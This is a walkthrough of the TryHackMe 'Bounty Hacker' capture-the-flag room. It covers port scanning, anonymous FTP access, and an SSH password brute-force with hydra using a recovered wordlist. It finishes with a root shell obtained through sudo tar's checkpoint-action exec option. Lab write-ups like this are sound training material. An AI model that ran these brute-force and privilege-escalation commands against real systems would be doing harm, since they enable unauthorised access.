BountyHunter is a pretty good “bounty hunter” anime-themed CTF from TryHackMe. It might be from a show called “cowboy bebop”? I’m not really sure, enjoyable CTF anyway.
The box requires some:
- General enumeration
- SSH brute-forcing
- Exploiting FTP anonymous account
- Exploiting
tar
for privilege escalation
Task 1
1. Deploy
-
2. Find all open ports on machine
nmap -A -p- target.thm -v
Scanning target.thm (10.10.237.73) [65535 ports]
Discovered open port 22/tcp on 10.10.237.73
Discovered open port 21/tcp on 10.10.237.73
Discovered open port 80/tcp on 10.10.237.73
Ports are:
22, SSH
21, FTP
80, HTTP
3. Who wrote the task list?
Navigate to host 10.10.237.73
.
- Blurb about 4 characters:
Spike
Jet
Ed
Faye
Test FTP for anon access
ftp 10.10.237.73
, use username Anonymous
, with a blank password.
Login works
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ ftp 10.10.237.73
Connected to 10.10.237.73.
220 (vsFTPd 3.0.3)
Name (10.10.237.73:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Check files in dir, and download them
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.06 secs (6.6875 kB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.06 secs (1.1806 kB/s)
Read stolen files
locks.txt
(seems like a list of passwords…)
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
cat task.txt
(the task list for the flag)
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
4. What service can you bruteforce with the text file found?
There were only 3 ports open on the scan, of which they’re used for the either FTP, SSH, HTTP. We could brute FTP, but we’d have less capability; HTTP, not really brutable with what we’ve uncovered so far; so SSH, seems like the best option.
5. What is the users password?
Lets assume:
Username: lin
Password file: locks.txt
And bruteforce with hydra -l lin -P ~/Desktop/TryHackMe/cowboyhacker/locks.txt ssh://target.thm
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ hydra -l lin -P ~/Desktop/TryHackMe/cowboyhacker/locks.txt ssh://target.thm
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-09 17:51:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://target.thm:22/
[22][ssh] host: target.thm login: lin password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-09 17:51:35
Revealing the password is RedDr4gonSynd1cat3
.
6. user.txt
Lets ssh
into the box with our cracked credentials lin:RedDr4gonSynd1cat3
.
ssh lin@target.thm
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ ssh lin@10.10.237.73
The authenticity of host '10.10.237.73 (10.10.237.73)' can't be established.
ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.237.73' (ECDSA) to the list of known hosts.
lin@10.10.237.73's password:
Permission denied, please try again.
lin@10.10.237.73's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$
Then we need to find and return user.txt
.
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
7. root.txt
Lets assume the root.txt
is in the /root
directory and ls
it to see if we can see anything there.
lin@bountyhacker:~/Desktop$ ls /root
ls: cannot open directory '/root': Permission denied
We don’t have permission, so need to find a privesc. Lets start with using sudo -l
to identify any root priviledged binaries we may have assigned.
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar
Output shows that we can exploit /bin/tar
as root
. On reading the /bin/tar
manual with /bin/tar --help
. We can see that we can exploit --checkpoint[=NUMBER]
and --checkpoint-action=[ACTION]
. Causing tar
to fire an action on every checkpoint.
Lets ‘create’ a tar compressed archive. We’ll use /dev/null
for input and output incase of lacking permissions..
sudo tar -c /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
Successfully achieved a root shell. Lets try find that last flag.
# ls /root
root.txt
# cat /root/root.txt